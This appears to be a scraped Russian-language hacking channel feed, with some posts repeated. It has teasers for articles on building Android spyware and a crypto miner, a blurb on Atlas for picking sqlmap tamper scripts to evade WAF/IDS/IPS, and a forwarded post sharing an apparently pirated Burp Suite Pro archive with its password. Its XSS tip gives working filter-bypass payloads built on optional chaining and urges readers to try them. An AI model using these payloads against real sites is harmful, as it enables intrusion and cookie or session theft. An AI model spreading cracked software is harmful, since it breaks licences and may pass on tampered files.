Как работают малвари?
Итак, наша задача — разобраться, как работают современные зловредные приложения. А лучший способ это сделать — посмотреть, как создается похожий софт. Как и боевой зловред, наш пример при желании сможет наблюдать и передавать информацию о целевом устройстве на сервер.
Читать инструкцию
Итак, наша задача — разобраться, как работают современные зловредные приложения. А лучший способ это сделать — посмотреть, как создается похожий софт. Как и боевой зловред, наш пример при желании сможет наблюдать и передавать информацию о целевом устройстве на сервер.
Читать инструкцию
Medium
Малварь для Android за полчаса. Отслеживаем местоположение, читаем SMS, пишем аудио и делаем фото
Итак, наша задача — разобраться, как работают современные зловредные приложения. А лучший способ это сделать — посмотреть, как создается…
Крипта хайпует. Давайте разберем пример написания собственного майнера
Читать howTo
Читать howTo
Medium
Пишем майнер криптовалюты на Java.
В качестве криптовалюты возьмем Electroneum. Это довольно перспективная криптовалюта из семейства Monero. Как заверяют разработчики, она…
💉 Инструмент для подбора tamper-скриптов в SQLMap
Atlas - это инструмент с открытым исходным кодом, который может предложить tamper скрипт для sqlmap, чтобы обойти WAF/IDS/IPS. Инструмент полагается на возвращаемый статус код.
Изначально требуется запустить
Более подробно о работе инструмента можно узнать на его GitHub странице.
Atlas - это инструмент с открытым исходным кодом, который может предложить tamper скрипт для sqlmap, чтобы обойти WAF/IDS/IPS. Инструмент полагается на возвращаемый статус код.
Изначально требуется запустить
sqlmap с более подробным выводом (опция -v 3) и если полезная нагрузка блокируется WAF/IDS/IPS, то попробовать запустить ее через Atlas, который покажет потенциальные скрипты для обхода средств защиты.Более подробно о работе инструмента можно узнать на его GitHub странице.
GitHub
GitHub - m4ll0k/Atlas: Quick SQLMap Tamper Suggester
Quick SQLMap Tamper Suggester . Contribute to m4ll0k/Atlas development by creating an account on GitHub.
Forwarded from burpsuite (not official)
burp_suite_pro_v2021.5.zip
393.8 MB
pass: 311138
README inside, plz read it before run BS.
Happy Hacking! 🥳
README inside, plz read it before run BS.
Happy Hacking! 🥳
🔗 Cовет по обходу фильтрации средств защиты от XSS
Знаете ли вы, что
Обязательно попробуйте это, если вы ищете способы обхода фильтрации средств защиты.
В основном вы можете использовать её где угодно, где бы использовали символы:
Знаете ли вы, что
window.alert?.() и (window?.alert)`` будут выдавать всплывающее окно??. - это фича, называется optional chaining, и, насколько я могу судить, ее нет практически ни в каких популярных списках полезных нагрузок для XSS.Обязательно попробуйте это, если вы ищете способы обхода фильтрации средств защиты.
В основном вы можете использовать её где угодно, где бы использовали символы:
. () `` []
Например:window?.['alert']?.(1)
(window?.['alert'])`1`
выглядят как абсолютное колдовство, но оба работают. Ниже еще несколько примеров:alert?.(document?.domain)
[document?.domain]?.map?.(alert)
top?.[/ale/?.source+/rt/?.source]?.(document?.[/dom/?.source+/ain/?.source])
#web #xss #wafMDN Web Docs
Optional chaining (?.) - JavaScript | MDN
The optional chaining (?.) operator accesses an object's property or calls a function. If the object accessed or function called using this operator is undefined or null, the expression short circuits and evaluates to undefined instead of throwing an error.
Инструменты обеспечения сетевой безопасности и инструменты для проведения тестирования на проникновение чаще всего используются службами безопасности для проведения проверки на наличие уязвимостей в сети и приложениях. В данной статье вы сможете найти всеобъемлющий список инструментов для тестирования на проникновения, который включает в себя проведения пентеста во всех средах.
Читать статью
Читать статью
Medium
10 главных инструментов хакера для взлома, пентеста и защиты систем
Инструменты обеспечения сетевой безопасности и инструменты для проведения тестирования на проникновение чаще всего используются службами…
Хакеры провели первую межсетевую атаку на DeFi-проекты, расположенные на разных блокчейнах — Ethereum и Binance Smart Chain (BSC)
X (formerly Twitter)
Igor Igamberdiev (@FrankResearcher) on X
Head of Research at @wintermute_t,
Research Collaborator at @paradigm,
ex @TheBlock__
𝝪(𝞂ₜ, 𝝩) → 𝞂ₜ₊₁
Views are my own
Research Collaborator at @paradigm,
ex @TheBlock__
𝝪(𝞂ₜ, 𝝩) → 𝞂ₜ₊₁
Views are my own
Хакинг требует много терпения и тяжелого умственного труда. На рынке есть много доступных инструментов, с помощью которых можно выполнять задачи, имеющие отношение к хакингу. Например, тест на проникновение, DDOS и т. п. Однако, если вы действительно хотите стать хакером, вы должны мастерски владеть языками программирования. Некоторые из лучших хакеров мира начинали как программисты. Если вы умеете программировать, вы сможете разобрать код и проанализировать его.
В этой статье мы составили короткий список из нескольких лучших языков программирования, которые вы можете начинать изучать, чтобы начать карьеру в хакинге. Все они играют различные роли и имеют разные преимущества, но вы должны знать их структуру и процесс работы.
В этой статье мы составили короткий список из нескольких лучших языков программирования, которые вы можете начинать изучать, чтобы начать карьеру в хакинге. Все они играют различные роли и имеют разные преимущества, но вы должны знать их структуру и процесс работы.
Medium
Языки программирования для хакеров
5 лучших языков программирования для хакинга